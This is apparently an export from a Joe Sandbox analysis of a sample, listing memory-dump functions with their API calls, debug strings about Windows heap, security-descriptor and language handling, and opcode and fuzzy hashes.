Snapshot File: hcaresult_0_2_40a000_y98WYYcJ2U.jbxd

Similarity

API ID: LabelVolume
String ID:
API String ID: 546053549-0
Opcode ID: 121b480cedf74468c6765497556dbc8b26d77828dade9409b992482b63398bf5
Instruction ID: 198765219231c7db2f491236dc739241dafe2ae98b98af4bf3fe8181498446e7
Opcode Fuzzy Hash: 121b480cedf74468c6765497556dbc8b26d77828dade9409b992482b63398bf5
Instruction Fuzzy Hash: DCE026323826009BE320D720ED0AFF93A246B90719F05402BF3855E2D0C7F01485CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB84, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__get_sse2_info.LIBCMT ref: 0040AB84

Memory Dump Source

Source File: 00000000.00000002.1330033651.000000000040A000.00000020.00020000.sdmp, Offset: 0040A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40a000_y98WYYcJ2U.jbxd

Similarity

API ID: __get_sse2_info
String ID:
API String ID: 2458614367-0
Opcode ID: fe1a347ea5cbe4ab0ab034e34530de6f077f280bdb109285cc518666439ec603
Instruction ID: 6d8571733e48ebcab1ec1a7eea15bbe134f4c4e206813d7f0fa535b64674b8d9
Opcode Fuzzy Hash: fe1a347ea5cbe4ab0ab034e34530de6f077f280bdb109285cc518666439ec603
Instruction Fuzzy Hash: BAA002B151120046C710DF31685508935A2A250209711D47F6545D615AEA345458A705

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 72701606, Relevance: 80.7, APIs: 21, Strings: 25, Instructions: 195COMMON

Download Yara Rule

APIs

DbgPrint.210A(HEAP[%wZ]: ,?,?,00000002,727358C0,72701AAF,?,726FF9AF,00000001,00000020,727358C0,00000000), ref: 72701635
DbgPrint.210A(HEAP: ,?,00000002,727358C0,72701AAF,?,726FF9AF,00000001,00000020,727358C0,00000000), ref: 7270163E
DbgPrint.210A(Heap error detected at %p (heap handle %p),?,00000002,727358C0,72701AAF,?,726FF9AF,00000001,00000020,727358C0,00000000), ref: 72701655
DbgPrint.210A(HEAP[%wZ]: ,?,00000020,727358C0,00000000), ref: 727016FC
DbgPrint.210A(HEAP: ,00000020,727358C0,00000000), ref: 72701705
DbgPrint.210A(Error code: %d - %s,72624832,00000020,727358C0,00000000), ref: 72701717
DbgPrint.210A(HEAP[%wZ]: ,?,?,?,?,?,727358C0,00000000), ref: 72701747
DbgPrint.210A(HEAP: ,?,?,?,?,727358C0,00000000), ref: 72701750
DbgPrint.210A(Parameter1: %p,?,?,?,?,727358C0,00000000), ref: 72701761
DbgPrint.210A(HEAP[%wZ]: ,?,?,?,?,?,727358C0,00000000), ref: 72701790
DbgPrint.210A(HEAP: ,?,?,?,?,727358C0,00000000), ref: 72701799
DbgPrint.210A(Parameter2: %p,?,?,?,?,727358C0,00000000), ref: 727017AA
DbgPrint.210A(HEAP[%wZ]: ,?,?,?,?,?,727358C0,00000000), ref: 727017D9
DbgPrint.210A(HEAP: ,?,?,?,?,727358C0,00000000), ref: 727017E2
DbgPrint.210A(Parameter3: %p,?,?,?,?,727358C0,00000000), ref: 727017F3
DbgPrint.210A(HEAP[%wZ]: ,?,?,?,?,?,727358C0,00000000), ref: 7270182A
DbgPrint.210A(HEAP: ,?,?,?,?,727358C0,00000000), ref: 72701833
DbgPrint.210A(Last known valid blocks: before - %p, after - %p,?,?,?,?,727358C0,00000000), ref: 7270184A
DbgPrint.210A(HEAP[%wZ]: ,?,?,?,?,?,?,?,?,727358C0,00000000), ref: 72701872
DbgPrint.210A(Stack trace available at %p,727358C0,?,?,?,?,?,?,?,727358C0,00000000), ref: 7270188B

Strings

Parameter3: %p, xrefs: 727017EE
heap_failure_entry_corruption, xrefs: 72701683
heap_failure_multiple_entries_corruption, xrefs: 7270168A
Last known valid blocks: before - %p, after - %p, xrefs: 72701845
heap_failure_usage_after_free, xrefs: 727016BB
Error code: %d - %s, xrefs: 72701712
heap_failure_lfh_bitmap_mismatch, xrefs: 727016D7
heap_failure_unknown, xrefs: 72701675
heap_failure_listentry_corruption, xrefs: 727016D0
Heap error detected at %p (heap handle %p), xrefs: 72701650
heap_failure_freelists_corruption, xrefs: 727016C9
heap_failure_invalid_argument, xrefs: 727016AD
heap_failure_cross_heap_operation, xrefs: 727016C2
HEAP[%wZ]: , xrefs: 72701630, 727016F7, 72701742, 7270178B, 727017D4, 72701825, 7270186D
Parameter2: %p, xrefs: 727017A5
heap_failure_block_not_busy, xrefs: 727016A6
heap_failure_buffer_overrun, xrefs: 72701698
HEAP: , xrefs: 72701616, 7270163D, 72701704, 7270174F, 72701798, 727017E1, 72701832, 7270187A
Parameter1: %p, xrefs: 7270175C
heap_failure_generic, xrefs: 7270167C
heap_failure_buffer_underrun, xrefs: 7270169F
heap_failure_invalid_allocation_type, xrefs: 727016B4
Stack trace available at %p, xrefs: 72701886
heap_failure_virtual_block_corruption, xrefs: 72701691
heap_failure_internal, xrefs: 7270166E

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 3558298466-2897834094
Opcode ID: c92d2287364535db8b76a2ec71fae101671fc06b4d2604a179065b3610c74dc5
Instruction ID: 08686a4953f725567ac026bac12b742dd66878d24a625b65fcb1e14a08dc0761
Opcode Fuzzy Hash: c92d2287364535db8b76a2ec71fae101671fc06b4d2604a179065b3610c74dc5
Instruction Fuzzy Hash: 6461B5379100C6DFD7238B9DCB42B5477E4EB18B73B68A01BE8055F682EE34A954CA19

Uniqueness

Uniqueness Score: -1.00%

Function 726540CC, Relevance: 73.3, APIs: 39, Strings: 2, Instructions: 1575memorynativeCOMMON

Download Yara Rule

APIs

ZwQueryInformationToken.210A(?,0000000A,?,00000038,?), ref: 72654235
RtlFindAceByType.210A(?,00000014,?,?,?,?,?,?,?,?,?,?,00000002,?,?,?), ref: 726545F3
RtlFindAceByType.210A(00000000,00000011,00000000,?,00000014,00000000,?,?,?,00000014,?,?,?,?,?,?), ref: 7265469D
RtlFindAceByType.210A(?,00000011,00000000,?,?,?,?,00000000,?,?,?,00000001,00000000,?,?,?), ref: 7265482E
RtlAllocateHeap.210A(?,?,00000001,?,?,00000700,?,?,?,?,?,?,00000001,?,?,?), ref: 72654AAB
memcpy.210A(?,?,?,?,?,00000001,?,?,00000700,?,?,?,?,?,?,00000001), ref: 72654AFB
memcpy.210A(?,?,00000001,?,?,00000001,?,?,00000700,?,?,?,?,?,?,00000001), ref: 72654B3B
memcpy.210A(?,?,?), ref: 72654B5E
RtlFreeHeap.210A(?,00000000,?), ref: 72654B9D
RtlFreeHeap.210A(?,00000000,?,?,00000000,?), ref: 72654BAD
RtlFreeHeap.210A(?,00000000,?,?,00000000,?,?,00000000,?), ref: 72654BBD
RtlFreeHeap.210A(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?), ref: 72654BCD
RtlFreeHeap.210A(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?), ref: 72654BDD
RtlFreeHeap.210A(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 72654C42
RtlCreateSecurityDescriptor.210A(?,00000001), ref: 72654C77
RtlFreeHeap.210A(?,00000000,00000000), ref: 72654CB2
RtlCreateAcl.210A(?,00000080,00000002,00000000,00000011,00000000,?,00000014,00000000,?,?,?,00000014,?,?,?), ref: 72654CF9
RtlAddMandatoryAce.210A(?,00000002,?,?,00000011,?,?,00000080,00000002,00000000,00000011,00000000,?,00000014,00000000), ref: 72654D24
RtlFreeHeap.210A(?,00000000,?,?,?,?,?,00000000,?,?,?,00000001,00000000,?,?,?), ref: 72654D58
memcpy.210A(?,?,?,?,?,00000001,?,?,00000700,?,?,?,?,?,?,00000001), ref: 72654DE4
RtlFreeHeap.210A(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 72654E2D
RtlFreeHeap.210A(?,00000000,?,?,?,?,?,?,00000700,?,?,?,?,?,?,00000001), ref: 726A98DA
RtlFreeHeap.210A(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 726A996F
RtlFreeHeap.210A(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 726A997E

Strings

@, xrefs: 726543AE
, xrefs: 726A9836

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$Free$memcpy$FindType$Create$AllocateDescriptorInformationMandatoryQuerySecurityToken
String ID: $@
API String ID: 2212045213-1077428164
Opcode ID: 5ee9bdc863068cfffeb7a7a03bea80f7fff201a65b6bf12cb711fc5a4707bada
Instruction ID: 0bd9955f3a36980dfd2b98249a149372f2825d5a5d1bdb95dfb2c2245fb48275
Opcode Fuzzy Hash: 5ee9bdc863068cfffeb7a7a03bea80f7fff201a65b6bf12cb711fc5a4707bada
Instruction Fuzzy Hash: B0D2A1716093819FD725CF29C890B9BBBF5AFC8304F14896EF98A87285E734D905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 72653114, Relevance: 68.7, APIs: 34, Strings: 5, Instructions: 435memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 72650F6F: RtlInitUnicodeString.210A(727366C0,WindowsExcludedProcs,00000000,00000000,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 72650FAA
Part of subcall function 72650F6F: ZwQueryLicenseValue.210A(727366C0,00000000,00000000,00000000,?,727366C0,WindowsExcludedProcs,00000000,00000000,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 72650FB7
Part of subcall function 72650F6F: RtlAllocateHeap.210A(?,00000008,00000000,727366C0,00000000,00000000,00000000,?,727366C0,WindowsExcludedProcs,00000000,00000000,?,727366C0,?,727384D8), ref: 72650FE0
Part of subcall function 72650F6F: ZwQueryLicenseValue.210A(727366C0,727384D8,00000000,?,?,?,00000008,00000000,727366C0,00000000,00000000,00000000,?,727366C0,WindowsExcludedProcs,00000000), ref: 72650FF6

RtlFreeHeap.210A(?,00000000,00000000,?,00000000,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726A8DA7

Part of subcall function 72650F6F: RtlFreeHeap.210A(?,00000000,00000000,727366C0,727384D8,00000000,?,?,?,00000008,00000000,727366C0,00000000,00000000,00000000,?), ref: 726A7B95

RtlFreeHeap.210A(?,00000000,00000000,?,00000000,?,00000000,727366C0,?,727384D8,?,7264CE97,00000000), ref: 72653195
RtlAllocateHeap.210A(?,00000008,?,?,00000000,?,00000000,?,00000000,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726531D7
memcpy.210A(00000000,00000000,?,?,00000008,?,?,00000000,?,00000000,?,00000000,727366C0,?,727384D8), ref: 726531F1
wcspbrk.210A(00000000,72624E18,727366C0,?,727384D8,?,7264CE97,00000000), ref: 72653204
RtlInitUnicodeString.210A(7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 72653224
RtlCultureNameToLCID.210A(7264CE97,?,7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 72653231
RtlFreeHeap.210A(?,00000000,7267F360,727366C0,?,727384D8,?,7264CE97,00000000), ref: 7265324F
RtlFreeHeap.210A(?,00000000,00000000,727366C0,?,727384D8,?,7264CE97,00000000), ref: 7265326C
RtlAllocateHeap.210A(?,00000008,?,?,00000000,?,00000000,?,00000000,?,00000000,727366C0,?,727384D8,?,7264CE97), ref: 726532AE
memcpy.210A(00000000,00000000,?,?,00000008,?,?,00000000,?,00000000,?,00000000,?,00000000,727366C0,?), ref: 726532C8
wcspbrk.210A(727384D8,72624E18,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726532DD
RtlInitUnicodeString.210A(7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726532FD
RtlCultureNameToLCID.210A(7264CE97,?,7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 7265330A

Part of subcall function 726537A0: memcpy.210A(?,?,00000000,00000000,00000000,00000001), ref: 72653804
Part of subcall function 726537A0: _wcsicmp.210A(00800000,?,00000000,00000000,00000001), ref: 72653889

RtlFreeHeap.210A(?,00000000,727384D8,727366C0,?,727384D8,?,7264CE97,00000000), ref: 72653328
RtlFreeHeap.210A(?,00000000,00000000,727366C0,?,727384D8,?,7264CE97,00000000), ref: 72653345
RtlAllocateHeap.210A(?,00000008,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,727366C0,?,727384D8), ref: 72653387
memcpy.210A(00000000,00000000,?,?,00000008,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 726533A1
wcspbrk.210A(00000000,72624E18,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726533B2
RtlInitUnicodeString.210A(7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726533CF
RtlCultureNameToLCID.210A(7264CE97,?,7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726533DC
wcspbrk.210A(-00000002,72624E18,7264CE97,?,7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726533EE
RtlInitUnicodeString.210A(7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 72653410
RtlCultureNameToLCID.210A(7264CE97,?,7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 7265341D
RtlFreeHeap.210A(?,00000000,00000000,727366C0,?,727384D8,?,7264CE97,00000000), ref: 72653443
RtlInitUnicodeString.210A(7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726A8E3F
RtlCultureNameToLCID.210A(7264CE97,?,7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726A8E4C
wcspbrk.210A(-00000002,72624E18,7264CE97,?,7264CE97,?,727366C0,?,727384D8,?,7264CE97,00000000), ref: 726A8E5E

Strings

Kernel-MUI-Language-Disallowed, xrefs: 72653277
WindowsExcludedProcs, xrefs: 7265314F
Kernel-MUI-Language-SKU, xrefs: 72653350
Kernel-MUI-Language-Allowed, xrefs: 726531A0
Kernel-MUI-Number-Allowed, xrefs: 7265316C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$Free$InitStringUnicode$CultureNamewcspbrk$Allocatememcpy$LicenseQueryValue$_wcsicmp
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 3889363205-258546922
Opcode ID: bf91d1797bb5cdde51cb557b04ba3d159149cbf148d59a7a7a0392bcb3a53163
Instruction ID: d72ca3c17bf3522b3a762555667d5e6a6c509a26793bf3ea1097779e0df07a0f
Opcode Fuzzy Hash: bf91d1797bb5cdde51cb557b04ba3d159149cbf148d59a7a7a0392bcb3a53163
Instruction Fuzzy Hash: 70F12B72D00259EFCB16DF9DC980ADEBBB9FF48A50F11406BE501A7290D7359E11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 72665790, Relevance: 53.1, APIs: 25, Strings: 4, Instructions: 2362COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.210A(C0000194), ref: 726659B4

Part of subcall function 7264CC90: DbgPrint.210A(RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?,?,?,-00000F38,00000000,?,?), ref: 726A5B5C
Part of subcall function 7264CC90: DbgPrint.210A(RTL: Edit ntos\rtl\generr.c to correct the problem,?,?,?,-00000F38,00000000,?,?), ref: 726A5B66
Part of subcall function 7264CC90: DbgPrint.210A(RTL: ERROR_MR_MID_NOT_FOUND is being returned,?,-00000F38,00000000,?,?), ref: 726A5B73

Part of subcall function 726675D9: RtlLeaveCriticalSection.210A(?,726675B4,?), ref: 726675F8

RtlEnterCriticalSection.210A(?,?), ref: 726659D1

Strings

#, xrefs: 72667597
HEAP: , xrefs: 72666418, 72666E9F
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 72666432, 72666EB6
HEAP[%wZ]: , xrefs: 72666409, 72666E90

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$CriticalSection$EnterErrorLeaveStatus
String ID: #$HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 1616612097-1481774953
Opcode ID: a3c87c55de6be469a17d56c7ee50a5f9307c631f3a37a32b479df7f23dbe7870
Instruction ID: 33b0c3803e047a3bd33796e32a5e0e3a7796251340f727fec9a18f9a2563956d
Opcode Fuzzy Hash: a3c87c55de6be469a17d56c7ee50a5f9307c631f3a37a32b479df7f23dbe7870
Instruction Fuzzy Hash: 34237D70A00255DFDB19CF69C480BA9BBF2FF49304F1481AED85AAB385D739A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 727044EF, Relevance: 47.8, APIs: 18, Strings: 9, Instructions: 529COMMON

Download Yara Rule

APIs

RtlCompareMemoryUlong.210A(-00000008,?,FEEEFEEE), ref: 727047B2
DbgPrint.210A(HEAP[%wZ]: ,-0000002C,-00000008,?,?), ref: 727048E6
DbgPrint.210A(HEAP[%wZ]: ,-0000002C,-00000008,?,FEEEFEEE), ref: 72704912
DbgPrint.210A(HEAP: ,-00000008,?,FEEEFEEE), ref: 7270491F
DbgPrint.210A(Heap block at %p is not last block in segment (%p),-00000018,?), ref: 72704934
DbgPrint.210A(HEAP[%wZ]: ,-0000002C), ref: 72704962
DbgPrint.210A(HEAP: ), ref: 7270496F
DbgPrint.210A(HEAP[%wZ]: ,-0000002C), ref: 727049BF
DbgPrint.210A(HEAP: ), ref: 727049CC
DbgPrint.210A(HEAP[%wZ]: ,-0000002C), ref: 72704A22
DbgPrint.210A(HEAP: ), ref: 72704A2F
DbgPrint.210A(HEAP[%wZ]: ,-0000002C), ref: 72704A66
DbgPrint.210A(HEAP: ), ref: 72704A73
DbgPrint.210A(Heap entry %p has incorrect PreviousSize field (%04x instead of %04x),-00000018,?,?), ref: 72704A91
DbgPrint.210A(HEAP: ,-00000008,?,?), ref: 72704ABB
DbgPrint.210A(Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x),?,00000000,?,-00000008,?,?), ref: 72704ACB
DbgPrint.210A(HEAP[%wZ]: ,-0000002C,-00000008,?,?), ref: 72704AFF
DbgPrint.210A(HEAP: ,-00000008,?,?), ref: 72704B0C

Strings

Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 72704AC6
Heap block at %p is not last block in segment (%p), xrefs: 727049D6
HEAP: , xrefs: 7270491A, 7270496A, 727049C7, 72704A2A, 72704A6E, 72704AB6, 72704B07
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 72704981
Free Heap block %p modified at %p after it was freed, xrefs: 7270492F
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 72704B19
Heap block at %p has incorrect segment offset (%x), xrefs: 72704A3B
HEAP[%wZ]: , xrefs: 727048E1, 7270490D, 7270495D, 727049BA, 72704A1D, 72704A61, 72704AFA
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 72704A8C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$CompareMemoryUlong
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 2560481200-3591852110
Opcode ID: 00fd08ad131f60bd0e72c313d91514594ec5cbacb6933b1f3109b476109bfc7d
Instruction ID: 9f0d8921cdbf7fb329f1f30bd29113ed84f09ee2ee2aeec6acb823590362eeff
Opcode Fuzzy Hash: 00fd08ad131f60bd0e72c313d91514594ec5cbacb6933b1f3109b476109bfc7d
Instruction Fuzzy Hash: 47121470600682DFD726CF6DC662BBABBF5FF09305F10845AE4868B681E734E859CB54

Uniqueness

Uniqueness Score: -1.00%

Function 72703490, Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 344memorytimeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.210A(?,?,00000000,?,72720980,00000048,726AE611,00000000,?), ref: 727034C4
RtlEnterCriticalSection.210A(?,72720980,00000048,726AE611,00000000,?), ref: 72703545
DbgPrint.210A(HEAP[%wZ]: ,-0000002C,RtlReAllocateHeap,72720980,00000048,726AE611,00000000,?), ref: 727035B7
DbgPrint.210A(About to reallocate block at %p to %Ix bytes,00000000,RtlReAllocateHeap,72720980,00000048,726AE611,00000000,?), ref: 727035D8
RtlReAllocateHeap.210A(?,?,00000000,00000000,RtlReAllocateHeap,72720980,00000048,726AE611,00000000,?), ref: 7270370D

Strings

HEAP: , xrefs: 727035BF, 727036D2, 727037FA, 7270389F, 727038F6
RtlReAllocateHeap, xrefs: 727034DB, 7270357B
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 72703907
About to reallocate block at %p to %Ix bytes, xrefs: 727035D3
Just reallocated block at %p to %Ix bytes, xrefs: 7270380E
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 727036F0
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 727038BC
HEAP[%wZ]: , xrefs: 727035B2, 727036C5, 727037ED, 72703892, 727038E9

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$AllocateCriticalDebugEnterHeapSectionTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3781477463-1700792311
Opcode ID: 55477da0c0523d897e7cb6d761b7e7547bc9f169844c60288caa950eeb02630a
Instruction ID: 77bb03e6138f1cdee2de8c62756dca1bded40909f428f212037123afe0c6d47b
Opcode Fuzzy Hash: 55477da0c0523d897e7cb6d761b7e7547bc9f169844c60288caa950eeb02630a
Instruction Fuzzy Hash: 8ED1F335900686DFCB22CFACC781BADBBF1FF05715F04805AE8969B692D734A949CB14

Uniqueness

Uniqueness Score: -1.00%

Function 7266D36F, Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 211nativethreadCOMMON

Download Yara Rule

APIs

memcmp.210A(-00000184,?,00000008,?,?), ref: 7266D3C6
ZwSetInformationThread.210A(000000FE,0000002C,?,00000008,?,?), ref: 726B242D

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 726B24EC
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 726B252F
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 726B25B5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 726B2572

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationThreadmemcmp
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 3942342040-1468400865
Opcode ID: 70ca208e9d8e0062801bf4a2e779397868c15ce9f73427302755ea2b336a8988
Instruction ID: 5d302bf8e63e33da64b4c7e9b720d3dd32f3b20828a067b8804e68870a49220a
Opcode Fuzzy Hash: 70ca208e9d8e0062801bf4a2e779397868c15ce9f73427302755ea2b336a8988
Instruction Fuzzy Hash: A47111B19083459FC752CF18C880B9B3FA9EF45754F00086AFA898B1C6C734E999CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 72661530, Relevance: 36.0, APIs: 17, Strings: 3, Instructions: 961memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,?,?), ref: 7266164D
memmove.210A(00000000,00000000,-000000F8,?), ref: 72661671
RtlFreeHeap.210A(?,?,00000000), ref: 7266167C
RtlAllocateHeap.210A(?,00000010,?), ref: 7266193D
RtlLeaveCriticalSection.210A(?,?), ref: 726619C7
memcpy.210A(?,00000000,00000000,?), ref: 726619E8
RtlFreeHeap.210A(?,00000010,00000000), ref: 726619F5
memset.210A(00000000,00000000,?), ref: 72661A76
RtlNtStatusToDosError.210A(00000000), ref: 726AE4E8

Strings

HEAP: , xrefs: 726AE930
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 726AE949
HEAP[%wZ]: , xrefs: 726AE921

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$AllocateFree$CriticalErrorLeaveSectionStatusmemcpymemmovememset
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 922990851-617086771
Opcode ID: cdd40b876a185c9963dd3bb81e4a27ffbeebc95efc13ed61ef37f7db528f3014
Instruction ID: f6896f2bef55c99b07ad9cc7c7bd2f01bb341664b7c3ff0c67cf5a05cda7f9bc
Opcode Fuzzy Hash: cdd40b876a185c9963dd3bb81e4a27ffbeebc95efc13ed61ef37f7db528f3014
